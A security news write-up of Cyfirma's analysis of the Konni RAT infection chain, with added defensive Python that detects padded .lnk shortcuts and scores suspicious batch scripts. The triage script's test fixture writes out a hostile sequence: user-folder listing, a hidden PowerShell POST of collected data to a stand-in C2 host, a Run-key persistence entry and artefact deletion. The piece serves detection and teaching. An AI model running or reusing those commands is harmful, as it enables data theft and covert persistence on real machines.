
Cyfirma’s recent analysis sheds light on Konni RAT, a sophisticated Remote Access Trojan (RAT) targeting Windows systems. This malware employs a multi-stage attack, utilizing a combination of batch files, PowerShell scripts, and VBScript to infiltrate systems, exfiltrate data, and maintain persistence.
“Konni RAT employs a multi-stage attack process involving a combination of batch files, PowerShell scripts, and VBScript to exfiltrate sensitive data, maintain persistence, and execute additional payloads,” the report states.
The infection chain begins with a ZIP archive containing decoy PDF files and a malicious .lnk file disguised as a .docx document. The LNK file exploits Windows Explorer’s quirks—such as file extension hiding and the 260-character path limit—to bury a command that launches cmd.exe and triggers a cascade of hidden execution steps.

“The file appears as a benign shortcut with 25 visible characters, followed by 235 whitespace characters… effectively hiding the actual command.”
This command initiates a PowerShell script that searches for .lnk files, decodes encrypted segments, and prepares the malware payload, including a malicious CAB file (disappear.cab) and a decoy document to distract the user.
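The whitespace-padding trick quoted above can be checked for statically, because the padded command line lives in the shortcut's COMMAND_LINE_ARGUMENTS field. The script below is an added example written for this page, not code from the Cyfirma report or the malware: it parses the ShellLinkHeader and StringData section of a .lnk file following the MS-SHLLINK layout, builds a constructed test shortcut (a harmless echo stands in for the real second-stage command), and flags arguments that contain a long whitespace run, exceed the 260 characters Explorer displays, or launch a script interpreter. The 32-character minimum run and the interpreter list are assumptions to tune.

```python
import re
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1 (only the ones needed here)
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# Explorer's Target field shows at most this many characters of the command line
EXPLORER_VISIBLE_LIMIT = 260
INTERPRETERS = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta)(\.exe)?\b", re.I)


def _read_string(data, pos, unicode):
    """Read one StringData entry: 2-byte character count, then the unterminated string."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if unicode:
        end = pos + count * 2
        return data[pos:end].decode("utf-16-le"), end
    end = pos + count
    return data[pos:end].decode("latin-1"), end


def parse_lnk(data):
    """Return the StringData fields of a .lnk file as a dict (missing fields are '')."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip LinkTargetIDList (IDListSize + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (its first field is its total size)
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            fields[name], pos = _read_string(data, pos, unicode)
        else:
            fields[name] = ""
    return fields


def assess_lnk(fields, min_pad=32):
    """Heuristics for the padding trick: long whitespace run, oversized command line, script interpreter."""
    findings = []
    args = fields["arguments"]
    target = fields["relative_path"]
    longest = max((len(m.group(0)) for m in re.finditer(r"[ \t\r\n]{2,}", args)), default=0)
    if longest >= min_pad:
        findings.append(f"{longest}-character whitespace run inside arguments")
    if len(target) + 1 + len(args) > EXPLORER_VISIBLE_LIMIT:
        findings.append("command line longer than the 260 characters Explorer displays")
    if INTERPRETERS.search(target) or INTERPRETERS.search(args):
        findings.append("shortcut launches a script interpreter")
    return findings


def build_lnk(relative_path, arguments):
    """Construct a minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS (test fixture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x80,          # FILE_ATTRIBUTE_NORMAL
                         0, 0, 0,       # creation / access / write FILETIMEs
                         0, 0,          # FileSize, IconIndex
                         1,             # ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)    # HotKey, Reserved1..3

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample mirroring the layout the report describes: a short visible command,
# 235 spaces, then a second command. The hidden part is a harmless placeholder echo.
VISIBLE_PART = "/c echo shortcut"
HIDDEN_PART = "& echo hidden-stage"
SAMPLE_LNK = build_lnk("..\\Windows\\System32\\cmd.exe", VISIBLE_PART + " " * 235 + HIDDEN_PART)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    print("target  :", fields["relative_path"])
    print("visible :", fields["arguments"][:40] + "...")
    for finding in assess_lnk(fields):
        print("finding :", finding)
```

Run it on files from a mail gateway quarantine or an extracted archive by reading each .lnk's bytes into `parse_lnk`; a shortcut whose arguments hold a run of 235 spaces, as in the quoted sample, trips all three heuristics, while an ordinary shortcut with a short target and no arguments returns no findings.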
Konni RAT’s architecture reflects a layered and modular design:
- PowerShell executes functions like friend, wickedness, and pregnant—names intentionally chosen to obfuscate behavior.
- A VBScript (start.vbs) is launched to maintain stealth, leveraging Windows Shell COM objects for indirect command execution.
- That script triggers a batch file (9315288.bat) that loops through other scripts, gathers system data, and even handles exfiltration.
“Its use of loops and conditionals reflects a design aimed at evading detection, achieving persistence, and adapting to the system’s state.”
The script collects:
- Directory listings from Downloads, Documents, and Desktop
- System details via systeminfo
All of this data is saved into files like d1.txt, d2.txt, and d4.txt.
These files are then uploaded to a C2 server (roofcolor[.]com) via encoded HTTP POST requests. Custom PowerShell functions encrypt the data, attach system identifiers like %COMPUTERNAME%, and erase all traces post-upload.
Konni RAT ensures long-term access by:
- Adding the VBScript to the Windows Registry Run key
- Deleting all temporary files, including .lnk, .cab, and intermediary .bat scripts
- Using silent execution (> nul) to suppress command window outputs
“This strategy conceals the presence of the LNK file and creates the illusion for the victim that the .docx file is the same as the one initially extracted.”
Even failed payloads are accounted for—if something doesn’t download correctly, the malware simply skips that step, deletes evidence, and proceeds with minimal impact.
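The collection, upload, Run-key persistence and self-cleanup steps described above each leave a recognisable pattern in the script text, which makes a lightweight static triage useful when a suspicious .bat or .vbs lands in quarantine. The following Python is an added example, not code from the report or from Konni RAT: it runs a small set of weighted indicators over a constructed batch fixture that imitates those steps (placeholder domain, not the real C2; file names follow the report). The indicator set, the weights and the threshold are assumptions to be tuned, not a published detection rule.

```python
import re

# Constructed fixture imitating the behaviour described in the write-up. The domain is a
# placeholder, not the real C2; the d1/d2/d4 file names follow the report.
SAMPLE_BAT = r'''
@echo off
dir "%USERPROFILE%\Downloads" > "%TEMP%\d1.txt"
dir "%USERPROFILE%\Documents" > "%TEMP%\d2.txt"
systeminfo > "%TEMP%\d4.txt"
powershell -w hidden -c "Invoke-WebRequest -Uri http://c2.example.invalid/u -Method POST -InFile $env:TEMP\d4.txt"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "wscript.exe %TEMP%\start.vbs" /f > nul
del /f /q "%TEMP%\*.lnk" "%TEMP%\*.cab" "%TEMP%\*.bat" > nul
'''

# Constructed benign script used as a control
BENIGN_BAT = r'''
@echo off
dir /b > filelist.txt
echo done
'''

# (name, pattern, weight); weights are an assumed scoring, tune them to your environment
INDICATORS = [
    ("run_key_persistence",
     re.compile(r"\breg(\.exe)?\s+add\s+\S*CurrentVersion\\Run\b", re.I), 3),
    ("script_host_autostart",
     re.compile(r"\b(wscript|cscript)(\.exe)?\s+\S+\.vbs\b", re.I), 2),
    ("user_folder_listing",
     re.compile(r"\bdir\s+\S*\\(Downloads|Documents|Desktop)\b", re.I), 2),
    ("systeminfo_to_file",
     re.compile(r"\bsysteminfo\b[^\n]*>\s*\S+", re.I), 2),
    ("http_post",
     re.compile(r"Invoke-WebRequest[^\n]*-Method\s+POST|\bcurl\b[^\n]*-X\s*POST", re.I), 3),
    ("self_cleanup",
     re.compile(r"\bdel\b[^\n]*\.(lnk|cab|bat)\b", re.I), 2),
    ("output_suppressed",
     re.compile(r">\s*nul\b", re.I), 1),
]


def triage_batch(text):
    """Map each indicator name to the number of times it matches in the script text."""
    hits = {}
    for name, pattern, _weight in INDICATORS:
        count = sum(1 for _ in pattern.finditer(text))
        if count:
            hits[name] = count
    return hits


def risk_score(hits):
    """Sum the weight of every distinct indicator that fired (repeat hits count once)."""
    weights = {name: weight for name, _pattern, weight in INDICATORS}
    return sum(weights[name] for name in hits)


def verdict(text, threshold=8):
    """Score a script body; the threshold is an assumed cut-off for escalating to analysis."""
    hits = triage_batch(text)
    score = risk_score(hits)
    return {"score": score, "suspicious": score >= threshold, "indicators": sorted(hits)}


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        result = verdict(body)
        print(f"{label}: score={result['score']} suspicious={result['suspicious']}")
        for name in result["indicators"]:
            print("  -", name)
```

Any one indicator on its own is common in legitimate administration; the combination of Run-key persistence, user-folder enumeration, an HTTP POST from a script and deletion of the script's own artefacts is what pushes the fixture well past the threshold, while the control script scores zero.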
Cyfirma confirms the tool’s ties to APT37, a North Korean state-sponsored group linked to espionage campaigns across Russia, East Asia, Europe, and the Middle East.
“Konni RAT… has been used in campaigns targeting political organizations and entities across Russia, East Asia, Europe, and the Middle East.”
The malware has been spotted in attacks against the Russian Ministry of Foreign Affairs, embedded within backdoored software and malicious macro-laced documents.
Konni RAT is designed to efficiently exfiltrate sensitive data, including system information and user files, to a remote server. Its modular design and advanced evasion strategies pose significant risks to system security, effectively bypassing detection and hindering analysis.